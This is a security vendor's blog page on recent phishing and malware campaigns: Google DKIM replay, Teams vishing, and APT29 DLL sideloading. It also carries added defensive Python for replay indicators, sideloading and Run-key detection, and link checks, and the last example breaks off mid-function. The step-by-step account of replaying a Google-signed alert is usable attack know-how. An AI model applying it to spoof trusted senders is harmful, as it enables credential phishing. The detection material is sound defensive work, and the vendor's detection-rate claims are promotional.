by titanadmin | Apr 30, 2025 | Phishing & Email Spam
Attackers have exploited a weakness in the way Google generates and signs its own account notifications to run a phishing campaign whose emails appeared to have been sent by Google from the no-reply[@]accounts.google.com address. The messages carried a genuine Google DKIM signature and passed DomainKeys Identified Mail (DKIM) verification, suggesting they were authentic Google mail, even though they had actually been relayed to victims from a different, non-Google mailbox.
The campaign was identified by developer Nick Johnson, who received an email seemingly sent from no-reply[@]accounts.google.com with the subject Security Alert. The email claimed that Google LLC had been subpoenaed to obtain a copy of the contents of his Google account and that a support case had been opened and transferred to Legal Investigations Support. A support reference number was included along with a link to a Google Sites website, encouraging him to click the link to examine the case materials and “submit a protest,” if necessary, via the option on the support website.
The lure used in this phishing attempt is similar to many other phishing campaigns that threaten legal action or warn about police investigations, although what makes the attempt stand out is how the phisher managed to make the email appear to have been sent by Google and pass the DKIM authentication check, resulting in the email being delivered to his inbox.
While the subject matter was potentially serious and the email had seemingly been sent by Google, there was a red flag that suggested a phishing attempt. As Johnson noticed, the link in the email did lead to a genuine Google property, but that property was sites.google.com, the free web-building platform Google provides for anyone to create and host personal web pages. No official message from Google would direct a user there, and certainly not a message about a subpoena for the contents of their Google account. The link led to a fake support portal, a copy scraped from the official support site. The aim of the phish appears to have been to trick Johnson into logging in on that copy and so disclosing his credentials, allowing his Google account to be hijacked.
An analysis of the message showed that Google itself had been tricked into signing it, which allowed it to pass the DKIM and DMARC authentication checks and so bypass spam filtering. DMARC needs only one aligned pass: SPF fails on a forwarded message, but the DKIM signing domain aligned with the From address, so the message passed. Closer inspection of the headers revealed that the mailed-by (Return-Path) domain differed from the From address: the message had been relayed in what is known as a DKIM replay attack.
The message had originally been sent to a me@ address at a domain controlled by the attackers, not to Johnson. According to Johnson, the attackers registered a domain, created a Google account for me[@]domain.com, and then created a Google OAuth app, entering the entire text of the phishing message in the app's name field. When they granted that app access to the me[@]domain.com account in Google Workspace, Google sent its standard security alert to that account, and the alert reproduced the app name, that is, the phishing text, in full. The attackers then forwarded that Google-generated alert to Johnson. Because none of the parts covered by the signature had been altered, it still passed the DKIM check on arrival.
The weakness exploited is that DKIM signs the message body and the headers listed in the signature's h= tag, not the SMTP envelope, so it says nothing about which server delivered a message or to whom. A copy extracted and re-sent without modifying anything that was signed therefore still carries a valid signature. The attackers' choice of the local part me@ also helped: Gmail's collapsed header shows the recipient as "me", so a To: address of me[@]domain.com blends in and the victim is unlikely to notice that the message was originally addressed to someone else. Google said in response to a query that it is aware of the phishing attempt and has rolled out protections to prevent further abuse.
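The checks a mail administrator could apply to a message like this, as an added example that is not code from the original post or from Google: it parses the DKIM-Signature tags, compares the From domain with the Return-Path (mailed-by) domain, checks whether the signed To: header matches the address the message was actually delivered to, and flags old signatures that carry no expiry. It does not verify the signature cryptographically (that needs the DNS key and a library such as dkimpy); it only reasons about what a valid signature does and does not cover. The two message samples, the domains attacker.example and example.org, and the age threshold are constructed for illustration.

```python
"""Replay indicators for a DKIM-signed message that was forwarded intact.

Added example, not code from the original post. DKIM covers only the body
and the headers listed in h=, not the SMTP envelope, so a relayed copy still
verifies; these heuristics look at what the signature leaves uncovered.
"""
import re
from email import message_from_string

# Constructed sample: a Google-signed alert relayed through a third-party
# mailbox to a victim who was never its original recipient.
FORWARDED = """Return-Path: <forwarder@attacker.example>
Received: from relay.attacker.example by mx.example.org; Sun, 20 Apr 2025 10:00:00 +0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=accounts.google.com; s=20230601; t=1744000000; h=to:from:subject:date:mime-version; bh=c29tZWJvZHk=; b=c2lnbmF0dXJl
From: Google <no-reply@accounts.google.com>
To: me@attacker.example
Subject: Security Alert

You granted access to a new application ...
"""

# Constructed sample: the same alert delivered directly to its real recipient.
DIRECT = """Return-Path: <bounce@accounts-noreply.bounces.google.com>
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=accounts.google.com; s=20230601; t=1744000000; h=to:from:subject:date:mime-version; bh=c29tZWJvZHk=; b=c2lnbmF0dXJl
From: Google <no-reply@accounts.google.com>
To: me@attacker.example
Subject: Security Alert

You granted access to a new application ...
"""


def parse_dkim_tags(value: str) -> dict:
    """Split a DKIM-Signature value into its tag=value pairs (RFC 6376 3.2)."""
    tags = {}
    for part in value.split(";"):
        if "=" in part:
            key, val = part.split("=", 1)
            tags[key.strip()] = re.sub(r"\s+", "", val)  # folding whitespace is not significant
    return tags


def bare_address(header_value: str) -> str:
    """Return the lower-cased address from 'Name <addr>' or a bare 'addr'."""
    value = header_value or ""
    match = re.search(r"<([^>]+)>", value)
    return (match.group(1) if match else value).strip().lower()


def org_domain(address: str) -> str:
    """Organizational domain (last two labels) of an address, for alignment checks."""
    return ".".join(address.rsplit("@", 1)[-1].split(".")[-2:])


def replay_indicators(raw: str, rcpt_to: str, now: int, max_age: int = 7 * 86400) -> list:
    """Return human-readable reasons this message looks like a replayed copy.

    rcpt_to is the SMTP envelope recipient the receiving MTA actually saw;
    now is the receive time as a Unix timestamp.
    """
    msg = message_from_string(raw)
    sig = msg.get("DKIM-Signature")
    if sig is None:
        return ["no DKIM-Signature header"]
    tags = parse_dkim_tags(sig)
    signed_headers = [h.lower() for h in tags.get("h", "").split(":") if h]
    findings = []

    # 1. DMARC passes on DKIM alignment alone, so a mailed-by domain that does not
    #    match the From domain is the single clearest sign of a forwarded copy.
    from_dom = org_domain(bare_address(msg.get("From")))
    path_dom = org_domain(bare_address(msg.get("Return-Path")))
    if from_dom != path_dom:
        findings.append(f"mailed by {path_dom}, From claims {from_dom}")

    # 2. The signature binds the To: header (if signed) but never the envelope
    #    recipient, so a mismatch means the message was addressed to someone else.
    to_addr = bare_address(msg.get("To"))
    if "to" not in signed_headers:
        findings.append("To header is not covered by the signature")
    elif to_addr != rcpt_to.lower():
        findings.append(f"signed To {to_addr} != envelope recipient {rcpt_to}")

    # 3. Without an x= expiry a captured signature stays valid indefinitely.
    age = now - int(tags.get("t", now))
    if "x" not in tags and age > max_age:
        findings.append(f"signature is {age // 86400} days old and never expires")
    return findings


if __name__ == "__main__":
    received_at = 1744000000 + 30 * 86400
    for line in replay_indicators(FORWARDED, "victim@example.org", received_at):
        print("forwarded:", line)
    print("direct:", replay_indicators(DIRECT, "me@attacker.example", 1744000000 + 60))
```

None of these signals is proof on its own: ordinary mailing-list and mailbox forwarding also produce a mailed-by mismatch. They are worth surfacing to the user or scoring in a filter precisely because the authentication results alone said "pass".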
The phishing attempt demonstrates the importance of stopping to think before clicking any link in an email, no matter how serious the apparent threat. It could easily have led to a compromised Google account had Johnson not paused to question the request, and others may not be as fortunate. While this is the first time Google is known to have been affected by a DKIM replay attack, it is a known phishing technique and one that can be highly effective.
Security awareness training should make clear that any email can carry a threat, even when the sender appears legitimate and the message passes authentication. Lures involving legal threats, police investigations, and subpoenas should be covered, as they create the fear that leads to a rapid click. Employees should be told to look beyond the From address: check the mailed-by or Return-Path domain in the message headers, check where a link actually leads before clicking, and report anything suspicious to the security team. They should also be given an easy one-click method of doing so in their email client.
Businesses should also ensure they have advanced anti-spam software with email sandboxing and URL filtering, and have multifactor authentication set up for all email accounts, with phishing-resistant multifactor authentication implemented when possible for the greatest protection.
by titanadmin | Apr 29, 2025 | Phishing & Email Spam, Security Awareness, Spam Software
Sophisticated phishing campaigns have been identified that avoid detection by ensuring that only approved targets are funneled to the phishing pages where login credentials are harvested. In a standard phishing campaign, a threat actor sends out tens of thousands of phishing emails to an email list. Many lists are freely available but can also be purchased cheaply on dark web marketplaces. This approach is often referred to as spray and pray – send out large numbers of untargeted emails in the knowledge that a small but significant number of individuals will respond.
A variety of lures and social engineering techniques are used to trick the recipient into clicking a link that directs them to a phishing page. The page mimics a well-known company and tells the victim that they must provide their login credentials to access the content they are expecting; any credentials entered are captured and used to log in to the user's account. Phishing infrastructure is frequently identified and its URLs added to real-time blocklists, after which email security solutions block the messages that carry them. Phishing pages are often discovered by crawlers and sandbox environments, and once a page has been listed far fewer individuals reach it. The threat actor must then switch to a clean URL, one that has not previously been detected, to continue the campaign.
One technique recently observed limits access to the phishing pages to approved targets, which prolongs the pages' lifespan by keeping them away from crawlers and sandboxes. When analysts examine a suspected phishing page, they enter test credentials. A legitimate login page rejects them as invalid, whereas a typical phishing page captures whatever is entered and then redirects to a URL of the threat actor's choosing, often the genuine login page of the impersonated service. The new technique checks the entered email address first: if it is not on the attacker's original target list, the submission is rejected and there is no capture and no redirect, so the analyst sees nothing to examine. This is implemented with validation scripts on the phishing page that check addresses in real time, or through API integrations. Although this level of sophistication would once have been out of reach for less skilled cybercriminals, such validation is now being bundled into phishing kits, which provide the infrastructure for low-skilled actors to run highly sophisticated campaigns. The kits, available for a fee, can also include tools to bypass multi-factor authentication.
The increasing sophistication of phishing campaigns means businesses need to implement sophisticated phishing defenses, which means adopting a defense-in-depth approach with multiple overlapping layers of protection. In practice, that means a spam filtering service to prevent phishing emails from reaching their intended targets. Advanced spam filters for incoming mail, such as SpamTitan, incorporate multiple layers of protection by analyzing every aspect of incoming emails and subjecting them to in-depth analysis to validate their legitimacy. This includes antivirus engines for malware detection, email sandboxing for in-depth analysis of files to identify novel malware, and AI and machine learning to identify phishing and other malicious content, including checks of how an email deviates from typical emails received from a business. The SpamTitan enterprise spam filter also includes multiple validation checks of the sender’s email and domain, greylisting to initially reject messages and request resending to block spam, and allow-listing, blocking, and dedicated blocklists created through extensive threat intelligence gathering.
An anti-phishing solution is recommended for Microsoft 365 environments to catch the malicious emails that Microsoft often misses. The PhishTitan anti-phishing solution integrates seamlessly with Microsoft 365, blocking more threats by augmenting Microsoft’s defenses with the same engine that powers SpamTitan. PhishTitan also adds banners to inbound emails from external sources to alert users to potential risks and combats spoofing and masking by rewriting URLs, showing their true destination. In independent tests, TitanHQ’s email security suite has been proven to provide exceptional protection against phishing, spam, and malware with 100% detection rates in Q4, 2024, and more than 99.99% accuracy in Q1, 2025.
Multifactor authentication should be configured for all email accounts to provide an additional layer of protection, and all users should be provided with ongoing security awareness training. For the most effective training, it should be conducted continuously in small chunks each month rather than an annual training session. A phishing simulator should also be used to reinforce training and identify individuals who fail to recognize phishing attempts to ensure they can be provided with the additional training they need. The SafeTitan security awareness training and phishing simulation platform makes this easy for businesses.
Give the TitanHQ team a call for more information on increasing the sophistication of your email defenses. All TitanHQ solutions are also available on a free trial to allow you to put them to the test in your own environment before making a purchase decision.
by titanadmin | Apr 28, 2025 | Security Awareness
A new campaign has been identified that abuses Microsoft Teams to deliver malware through a tech support scam. The user is tricked into believing they need help resolving a technical issue and into granting the "technician" access through Quick Assist, the remote assistance tool built into Windows.
Tech support scams are a very common form of cybercrime. According to the FBI’s Internet Crime Complaint Center (IC3), 36,002 complaints were received about tech support scams in 2024, making it the 6th most commonly reported cybercrime, and the third biggest cause of losses, with more than $1.46 billion lost to the scams in 2024 alone. It should be noted that many victims fail to report these scams to the FBI, so the number of victims and the losses are likely to be substantially higher.
While the companies impersonated are highly varied, these scams typically involve contact being made with the victim, with the scammer impersonating a member of the technical support team to resolve a fictitious technical issue. To make these scams more realistic, threat actors may add a targeted individual to numerous newsletters and spam sources, and then call to help them resolve the spam problem that the threat actor has created.
One of the latest scams made contact via Microsoft Teams with targets in the services sector, including finance, professional, and scientific services. One common denominator was that the targeted individuals all had female-sounding names, and most were executive-level employees. The scam was also conducted at a specific time, between 2 p.m. and 3 p.m. local time, which the threat actors apparently judged to be when attention would be lowest and the scam most likely to succeed.
The Teams request was accompanied by a vishing call. Over the phone, the target was talked into running a PowerShell command delivered in a Microsoft Teams message, which downloaded the first-stage payload. The threat actor then used Quick Assist for remote access to the device to complete the PowerShell-based deployment, all under the guise of resolving a fictitious technical issue.
Through Quick Assist, the threat actor dropped a signed file named Team Viewer.exe into a hidden folder; as a legitimately signed binary, it is likely to go unnoticed among normal system activity. That executable was used to sideload a malicious DLL named TV.dll, which in turn delivered a second-stage JavaScript-based backdoor providing persistent access to the device. Persistence was achieved by modifying registry entries. The campaign was identified by a ReliaQuest researcher and attributed to a tracked threat actor that uses vishing to infect users with malware, often leading to a ransomware attack. One way to block these attacks is to configure Microsoft Teams to block external communications, preventing the initial contact, and, if Windows Defender is used, to apply its most restrictive settings to limit the use of PowerShell.
Ultimately, this scam succeeded because an end user was contacted, and social engineering techniques were used to trick them into taking the actions that the threat actor could not otherwise have performed externally. The recently published Verizon Data Breach Investigations Report revealed that 60% of data breaches involved the human element, with social engineering one of the most common ways that employees are tricked. It is not necessary for threat actors to spend countless hours trying to find zero-day vulnerabilities in software solutions when they can just contact employees and get them to provide the access they need.
As the IC3 data shows, these scams are lucrative for threat actors, and one of the reasons why they are so successful is that they tend to take place over the phone, bypassing the need to defeat anti-spam software and other technical security measures. Since legitimate remote access tools are used, the malicious activity is easy to hide within normal system activity.
Security awareness training can go a long way toward improving defenses against these types of scams. Executives were targeted in this campaign because they hold higher-level privileges than other workers, yet security awareness training is often less robust at the executive level. It is important to ensure that all members of the workforce, from the CEO down, are provided with security awareness training, and that the training is tailored to different roles and the specific threats each is likely to encounter.
With the SafeTitan security awareness training platform, it is easy to create tailored training programs for different members of the workforce and the unique threats that they face, including specific programs for the CEO and executives, the HR department, and the IT team. With the SafeTitan platform, there are hundreds of training modules tailored to different aspects of cybersecurity and different threats, making it quick and easy to create and deliver highly effective training courses covering phishing and other email-based attacks, smishing, vishing, and other cyber threats.
Give the TitanHQ team a call today for more information on improving your cybersecurity defenses and security awareness training programs. All TitanHQ solutions are available on a free trial, with support provided to make sure you get the most out of your trial.
by titanadmin | Apr 26, 2025 | Phishing & Email Spam
The latest data from Verizon shows that phishing was the third most common method of initial access in the data breaches analyzed for its 2025 Data Breach Investigations Report. Phishing accounted for 16% of the breaches in this year's report, having been overtaken by vulnerability exploitation (20%). The leading initial access method was credential abuse, involved in 22% of breaches. Verizon notes, however, that while incident responders may identify compromised credentials as the cause, it is not always clear how those credentials were obtained. They may have been stolen in an earlier phishing attack that went undetected, so phishing may have been involved in a higher percentage of breaches.
The report highlights the extent to which cybercriminals exploit human weaknesses. The human element was involved in approximately 60% of data breaches in 2024, down slightly from 61% the previous year. The human element could be a click on a link in a phishing email that results in credential theft, a visit to a malicious website where malware is downloaded, a misconfiguration that is exploited, or a response to a phone call or text message. In 32% of breaches the human element took the form of credential abuse, in 23% a social action such as phishing or pretexting, in 14% an error, and in 7% an interaction with malware.
This year’s report delves into the importance of security awareness training and how providing regular training can really make a difference to an organization’s security posture, especially when combined with phishing simulations. Providing training to the workforce will teach employees about security best practices, which will help to eradicate risky behaviors. Employees should be taught how to identify a phishing email and be conditioned to report any suspicious emails to their security team immediately. Phishing simulations help to reinforce training and identify individuals who have failed to apply the training. If an individual fails a phishing simulation, they can be provided with additional training to help ensure they do not make a similar identification error in the future.
The report revealed that out of the companies that provided security awareness training and conducted phishing simulations, there was a much higher reporting rate when employees had received training more recently. The baseline reporting rate was 5%, which shot up to 21% with recent training.
The data shows why it is so important to provide ongoing security awareness training to keep cybersecurity matters fresh in the mind. It is also important to incentivize employees to report potential phishing emails rather than punish those who don’t, and to clearly explain that reporting suspicious emails helps security teams to contain threats more quickly and limit the damage. It is also important to make it as easy as possible for employees to report potential threats. Ideally, employees should be able to report a potential phishing or scam email with a single click in their email client.
TitanHQ offers an email security suite that includes the SpamTitan cloud-based anti-spam service and the PhishTitan phishing prevention and remediation solution for Microsoft 365 users. SpamTitan incorporates dual anti-virus engines for detecting known malware, email sandboxing for detecting novel threats, AI and machine learning algorithms for identifying phishing and spam emails, plus SPF, DKIM and DMARC checks, allow listing, blocking, greylisting, and dedicated real-time block lists. An email client add-in is also provided to allow employees to easily report potential threats.
The PhishTitan solution is based on the same engine that powers SpamTitan, incorporating AI and machine learning to detect phishing threats, and also adds banner notifications for emails to warn employees about potential threats from external email addresses. The remediation tools provided by PhishTitan allow security teams to rapidly respond to threats and eliminate them from their email system.
Both email security solutions have high detection accuracy and provide best-in-class protection from email threats. In recent independent tests at VirusBulletin, the solutions were demonstrated to have exceptional detection accuracy, blocking in excess of 99.99% of spam and phishing threats, and thanks to the email sandbox service, TitanHQ’s solutions blocked 100% of malware.
TitanHQ can also help with security awareness training and phishing simulations. The SafeTitan platform makes it easy to create and automate continuous security awareness training programs for the workforce. The training content is enjoyable and interactive and is delivered using computer-based training, with individual modules taking no more than 10 minutes to complete.
The training content is regularly updated and has been proven to improve security awareness and reduce susceptibility to cyber threats, especially when combined with TitanHQ’s phishing simulator. Internal simulated phishing campaigns can be created and automated, and will automatically generate additional training immediately in response to a security failure, ensuring training is delivered at the time when it is most likely to be effective.
Through security awareness training and phishing simulations, organizations can reduce the employee errors that cause so many data breaches, and by using TitanHQ’s email security suite, threats will be blocked before employees’ security awareness is put to the test.
Give the TitanHQ team a call today to discuss the best options for improving your defenses. All TitanHQ solutions are available on a free trial and assistance can be provided to help you get the most out of the free trial.
by titanadmin | Apr 25, 2025 | Phishing & Email Spam
A recently published report commissioned by the UK's Home Office and Department for Science, Innovation and Technology (DSIT) has revealed that 43% of UK businesses and 30% of UK charities experienced a cybersecurity breach in the past 12 months.
While there was a slight fall in the number of businesses and charities suffering a cybersecurity incident, there was a significant increase in ransomware attacks. The survey covered 2,180 businesses, 1,081 charities, and 574 educational institutions. Extrapolated from the number of confirmed incidents, that equates to around 612,000 UK businesses and 61,000 UK charities experiencing a cyber breach or cyberattack in the past 12 months.
While there was a slight decline in cyber incidents, which were confirmed by 50% of businesses in last year’s study, it is clear that hacking and other types of cyber incidents continue to pose a massive threat to UK businesses, with ransomware attacks of particular concern. According to the report, the estimated percentage of ransomware crime increased from less than half a percent in 2024 to 1% in 2025, which suggests that around 19,000 UK businesses experienced a ransomware incident in the past 12 months. 4% of large businesses and 3% of medium-sized businesses admitted to paying the ransom demand to recover their data and prevent its publication online.
The biggest cyber threat to UK businesses by some distance is phishing: the fraudulent practice of sending emails or other messages that trick individuals into disclosing sensitive information such as login credentials or into installing malware. Over the past 12 months, 93% of businesses and 95% of charities that experienced a cybercrime incident identified phishing as the cause of at least one of those incidents. Businesses confirmed as victims of cybercrime experienced an average of 30 cybercrime incidents in the past 12 months, and charities an average of 16.
The credentials stolen in these attacks and the malware installed give cybercriminals initial access to internal networks. From there, they can deploy additional malware payloads and ransomware and steal sensitive data. The phishing problem is also getting worse for businesses, as cybercriminals are leveraging large language models (LLMs) to craft extremely convincing phishing emails and conduct phishing attacks at scale. These tools can be used to generate fake images, make phishing lures more believable, and make them harder to detect.
With phishing such a major threat and the high cost of dealing with each phishing incident, UK businesses and charities need to have email security defenses capable of detecting and blocking phishing threats, including those developed using AI and LLMs.
Phishing defenses should consist of anti-spam software, multifactor authentication, and end user security awareness training as a minimum. Advanced email filtering software incorporates antivirus software to identify known malware threats, email sandboxing for detecting novel malware threats, link scanning, and machine learning and AI-aided detection.
Over the past three quarters, SpamTitan from TitanHQ has consistently demonstrated in independent tests that it is capable of blocking even the most advanced threats, routinely achieving a 100% malware detection rate, and phishing and spam detection rates in excess of 99.99%.
TitanHQ also offers a comprehensive security awareness training and phishing simulation platform – SafeTitan – for improving awareness of cyber threats. When combined with phishing simulations, the platform has been shown to reduce employee susceptibility to phishing by up to 80%. The training content is enjoyable and memorable, and is delivered in training modules of no more than 10 minutes to maximize knowledge retention and make training easy to fit into busy workflows.
All TitanHQ solutions have been developed to provide powerful protection and advanced features, while also being easy to set up, configure, and use. Further, they are available at a price point that is affordable for businesses of all sizes. Give the TitanHQ team a call today to find out more about improving your defenses against phishing and other cyber threats. Further, TitanHQ’s cloud-based anti-spam service and security awareness training platform are available on a free trial, allowing you to put them to the test before making a purchase decision.
by titanadmin | Apr 24, 2025 | Phishing & Email Spam
A phishing scam has been identified targeting staff of European embassies with an invitation to a fake wine-tasting event. Targets include European diplomats and the staff of non-European countries at embassies located in Europe. The campaign has been linked to the Russian state-sponsored hacking group, Cozy Bear (aka APT29, Midnight Blizzard), and is believed to be primarily an espionage campaign.
The aim of the campaign is to deliver a stealthy new backdoor malware dubbed GrapeLoader. The campaign, identified by Check Point, is believed to be part of a wider campaign targeting European governments, diplomats, and think tanks. The malware delivered in the campaign serves as a loader for delivering additional payloads and is used as an initial stage tool for fingerprinting and establishing persistence.
As is typical of spear phishing campaigns, considerable effort went into a lure likely to elicit a response. The emails announce a fake diplomatic event, usually a wine tasting, with some offering a place at a diplomatic dinner, and purport to come from a named individual at a real European foreign affairs ministry whose identity is impersonated. A series of follow-up messages is sent to anyone who fails to respond to the invitation. The phishing link is also configured to redirect to the real foreign ministry website if it is opened outside the expected time zone or by an automated tool.
The emails prompt the recipient to click an embedded link to a spoofed website that offers a file download. The download is a zip archive containing wine.exe, a renamed copy of a legitimate PowerPoint executable, and two hidden DLLs: one is a legitimate dependency the executable needs in order to run, and the other, dubbed GrapeLoader, is the malicious library that wine.exe loads via DLL sideloading. GrapeLoader fingerprints the device, contacts its command-and-control server, and delivers additional payloads. A Run registry key is added so that wine.exe is executed again after a reboot.
The malware has been designed to be stealthy, including masking strings in its code and only decrypting them for a short time in the memory before they are erased. This technique prevents analysis using tools such as FLOSS. The malware also makes memory pages temporarily inaccessible to evade antivirus scans. GrapeLoader is thought to lead to the delivery of a modular backdoor known as WineLoader, which has been used in previous Cozy Bear campaigns on governments and political parties.
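The GrapeLoader chain above and the Quick Assist scam described earlier on this page (Team Viewer.exe sideloading TV.dll from a hidden folder) share the same two telemetry signatures: a DLL loaded from the same user-writable directory as the host executable, and a Run key that points into a user profile. The following is an added example, not code from either post, from Check Point or from ReliaQuest, showing detection logic for both over Sysmon-style events (Event ID 7, image loaded; Event ID 13, registry value set). The event records are constructed and reduced to the fields the rules use; the user name, folder names and loader.dll are illustrative, not indicators from the campaigns, and the list of user-writable roots is an assumption to tune for your own estate.

```python
"""Sideloading and Run-key persistence rules over Sysmon-style telemetry.

Added example, not code from the posts or the researchers they cite.
Event shapes follow Sysmon's Event ID 7 (ImageLoaded, Signed) and Event ID 13
(TargetObject, Details) but are reduced to the fields the rules need.
"""
from pathlib import PureWindowsPath

# Constructed sample telemetry: two sideloads like the ones described, a benign
# system DLL load, a same-folder load under Program Files (out of scope here),
# a Run key into a user profile, and a benign Run key.
EVENTS = [
    {"EventID": 7, "Image": r"C:\Users\jdoe\AppData\Roaming\.cache\Team Viewer.exe",
     "ImageLoaded": r"C:\Users\jdoe\AppData\Roaming\.cache\TV.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Users\jdoe\AppData\Roaming\.cache\Team Viewer.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
    {"EventID": 7, "Image": r"C:\Users\jdoe\Downloads\wine\wine.exe",
     "ImageLoaded": r"C:\Users\jdoe\Downloads\wine\loader.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\plugin.dll", "Signed": "false"},
    {"EventID": 13, "Image": r"C:\Users\jdoe\Downloads\wine\wine.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\wine",
     "Details": r"C:\Users\jdoe\Downloads\wine\wine.exe"},
    {"EventID": 13, "Image": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"},
]

# Assumption: top-level folders a standard user can write to. Extend as needed.
USER_WRITABLE_ROOTS = ("users", "programdata")


def user_writable(path: str) -> bool:
    """True if the path sits under a user-writable root such as C:\\Users\\..."""
    parts = [p.lower() for p in PureWindowsPath(path.strip().strip('"')).parts]
    return len(parts) > 2 and parts[1] in USER_WRITABLE_ROOTS


def sideload_alerts(events: list) -> list:
    """Apply both rules to a list of events and return the alerts raised."""
    alerts = []
    for event in events:
        if event["EventID"] == 7:
            host = PureWindowsPath(event["Image"])
            dll = PureWindowsPath(event["ImageLoaded"])
            # Sideloading loads the DLL from the host's own folder; Windows
            # binaries normally resolve their imports from System32 instead.
            if (dll.suffix.lower() == ".dll"
                    and dll.parent == host.parent
                    and user_writable(event["Image"])
                    and event.get("Signed", "").lower() != "true"):
                alerts.append({"rule": "unsigned_dll_beside_host",
                               "host": str(host), "dll": str(dll)})
        elif event["EventID"] == 13:
            target = event.get("TargetObject", "").lower()
            details = event.get("Details", "")
            # A Run value whose command lives in a user profile is the
            # persistence both campaigns used.
            if "\\currentversion\\run\\" in target and user_writable(details):
                alerts.append({"rule": "run_key_into_user_path",
                               "value": event["TargetObject"], "command": details})
    return alerts


if __name__ == "__main__":
    for alert in sideload_alerts(EVENTS):
        print(alert)
```

The same-folder rule deliberately ignores Program Files, where installers legitimately ship private DLLs; in practice you would allow-list known software there rather than widen the rule. Sysmon's Event ID 7 reports the signature status of the loaded DLL, not of the host process, so the host's own signature (the point of using a signed Team Viewer.exe) is not something this event can tell you; pair the alert with a file signature check during triage.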
by titanadmin | Apr 22, 2025 | Phishing & Email Spam
One of the common tactics for getting phishing emails into inboxes is to send them through a legitimate service, since such messages are far less likely to be blocked by email security solutions. Email security solutions perform reputation checks on sending addresses and domains, and those found to have been used for spamming or sending malicious email are rapidly added to real-time blocklists (RBLs). If a message's reputation score crosses the configured threshold, it is blocked and quarantined, so it never reaches its intended target.
These reputation checks are often passed if emails are sent via trusted services such as Dropbox and Google Calendar, and similarly if malicious files or content are hosted on legitimate services such as OneDrive, GitHub, Google Drive, or SharePoint. The fact has not been lost on threat actors, who regularly abuse these services.
Fake login pages may be hosted on cloud storage services, and malicious files shared through them. Not only can these emails evade checks due to the good reputation of the sites, these well-known brands are familiar to end users and are often trusted, increasing the probability that credentials will be divulged or files will be downloaded.
For instance, a recent campaign abusing Dropbox used the platform to send an email about a shared file, which was also hosted on a legitimate Dropbox account. The email contained a link to a malicious PDF file, branded with the details of a company known to the targeted employees. The PDF file contained a link to another, unrelated website, where a malicious file was hosted. The phishing emails used a plausible lure to convince the user to click the link and download and execute the file.
A new campaign has recently been identified that uses a different legitimate service to evade reputation checks. The campaign, detected by security researchers at Kaspersky, was sent via a service called GetShared. While not as well known as Google Calendar or Dropbox, the service sends its own file-sharing notifications, which allowed the attackers to deliver their lure from a trusted domain and a legitimate file-sharing service.
Similar to the Dropbox campaign, GetShared was used to send an email to targeted individuals advising them that a file had been shared with them via GetShared, as it was too large to send via email. The use of the file-sharing service seems reasonable, and the urgency was believable. The user was told that the file would be deleted after a month, and they were asked to provide a quote including the delivery time and payment terms. One of the intercepted emails targeted a designer using a shared file called DESIGN LOGO.rar.
The user was given a download button, which links to the site where the file can be downloaded. Once such an archive is opened and its contents extracted, there are several possible attack methods. The archive could contain an executable with a double file extension, making it likely that the file would be run. It could contain a link to a malicious document or phishing page. In this case, it was part of a vishing campaign: the archive contained contact details for the user to call, and the call would then be used to talk the victim into downloading a file or disclosing credentials or other sensitive information.
Earlier this year, a campaign was identified that used Google Calendar, with the emails sent through the platform containing a calendar invite. The invite is automatically added to the user’s Google Calendar account if they have Calendar set up and configured to automatically accept invitations. The invite contained a link to Google Forms or Google Drawings, which contained a link to a phishing website. That website impersonated a well-known brand and required the user to log in with their credentials. The campaign targeted more than 300 brands including healthcare providers, educational institutions, banks, and others, and involved thousands of emails.
Traditional email security solutions are unlikely to block emails from these trusted senders, and malicious files hosted on trusted platforms are also unlikely to be blocked. Businesses can combat these types of phishing attacks by using an advanced email spam filter that incorporates AI and machine learning algorithms and email sandboxing in addition to the standard reputation checks and blacklists. The best spam filters for businesses provide multiple layers of protection to block these malicious emails and prevent them from reaching inboxes; however, because genuine and malicious communications from legitimate platforms are hard to tell apart, security awareness training is vital.
Employees should be trained on how to identify phishing emails and told not to trust emails from legitimate platforms, as while the platforms can be trusted, the content cannot. It is also recommended to use a phishing simulator to run simulations of phishing using lures that abuse trusted platforms to gauge how employees respond and provide targeted training to individuals who are tricked by these campaigns.
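The check a mail gateway or an analyst can apply to these notifications is simple: the message may genuinely be signed by the platform, but the links inside it should stay on that platform. The Python below (standard library only) is an added example, not TitanHQ or any vendor's code; the sample message, the gateway identity mx.example.net and the list of free publishing hosts are constructed for illustration. It reads the DKIM result from the Authentication-Results header that our own gateway added, then flags links that leave the signer's domain, point at free hosting such as sites.google.com, or display one URL as text while linking to another.

```python
"""Flag links in a platform notification that lead away from the platform.

Added example (not vendor code). The sample message, AUTHSERV_ID and the
FREE_HOSTING list are constructed assumptions for illustration.
"""
import re
from email import message_from_string, policy
from urllib.parse import urlparse

# Identity our own gateway writes into Authentication-Results. Only that
# header instance is trusted; upstream or forged copies are ignored.
AUTHSERV_ID = "mx.example.net"

# Hosts where anyone can publish a page. Excellent domain reputation, but
# the content is user-supplied, not the vendor's (illustrative list).
FREE_HOSTING = {"sites.google.com", "docs.google.com", "forms.gle", "github.io"}

LINK_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def dkim_signer(msg):
    """Domain that signed the message (dkim=pass header.d=...) according to
    our gateway's Authentication-Results, or None."""
    for value in msg.get_all("Authentication-Results", []):
        authserv, _, results = str(value).partition(";")
        if authserv.strip().lower() != AUTHSERV_ID:
            continue
        m = re.search(r"dkim=pass[^;]*?header\.d=([\w.-]+)", results, re.I)
        if m:
            return m.group(1).lower()
    return None


def registrable(host):
    """Crude eTLD+1 (last two labels). Use the Public Suffix List in
    production; this is enough for the constructed sample."""
    return ".".join(host.lower().split(".")[-2:])


def extract_links(html):
    """(href, visible text) pairs, with inner tags stripped from the text."""
    return [(href, re.sub(r"<[^>]+>", "", text).strip())
            for href, text in LINK_RE.findall(html)]


def analyse(raw_message):
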